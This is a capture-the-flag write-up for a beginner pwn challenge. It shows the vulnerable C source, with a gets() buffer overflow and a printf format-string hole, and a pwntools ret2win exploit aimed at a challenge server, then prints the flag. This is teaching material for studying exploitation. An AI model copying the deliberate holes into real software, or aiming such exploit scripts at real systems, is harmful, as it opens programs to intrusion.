AUCHALL - [Pwn] - jump2win


Challenge Description

A leap of faith.

Solution

The first thing to check is the binary's protections.


Only NX is enabled, which means we cannot execute injected shellcode on the stack.

PIE is disabled, so the address of every function in the binary is fixed and can be hardcoded in the payload.

On checking the source code, I found that it uses the gets() function, so we can do a buffer overflow.

Source Code

#include <stdio.h>
#include <stdlib.h>

/* Never called by the program itself: this is the ret2win target. */
void call_my_function(void) {
    FILE *file;
    char line[100];
    file = fopen("/flag", "r");
    if (file == NULL) {
        puts("[FAIL] Contact an admin.\n");
        exit(1);
    }
    while (fgets(line, sizeof(line), file) != NULL) {
        puts(line);
    }
    fclose(file);
}

void vuln() {
    int allowed = 0;
    char buffer[50];
    printf("Hello, my name is Ali, what is yours? ");
    gets(buffer);     // no bounds check: input longer than 50 bytes overflows the stack
    printf(buffer);   // :)  user input used directly as the format string
}

int main() {
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    vuln();
}

Offset

To find the offset, we run the binary in gdb and crash it with a cyclic pattern.


So the offset from the start of the buffer to the saved return address is 66 bytes.

Solution

I made a simple pwntools script to get this working

from pwn import *

elf = ELF('./jmp')

# Run locally by default; pass REMOTE=1 PORT=<n> to target the challenge server.
# The port is not given in the writeup, so it is read from the command line.
if args.REMOTE:
    io = remote('section-b.cy243l.ooguy.com', int(args.PORT))
else:
    io = process('./jmp')

print(io.recv())

# 66 bytes of padding reach the saved return address, which is overwritten with
# the address of call_my_function (fixed, because PIE is disabled).
payload = cyclic(66) + p32(elf.sym.call_my_function)
io.sendline(payload)
print(io.recv())
io.interactive()


Flag

The flag is dynamic.

CY243L{ret2wins_are_easy_no_0F01Cd9_X6V8_1MZx}

Writeups 2023 © RootxRAN.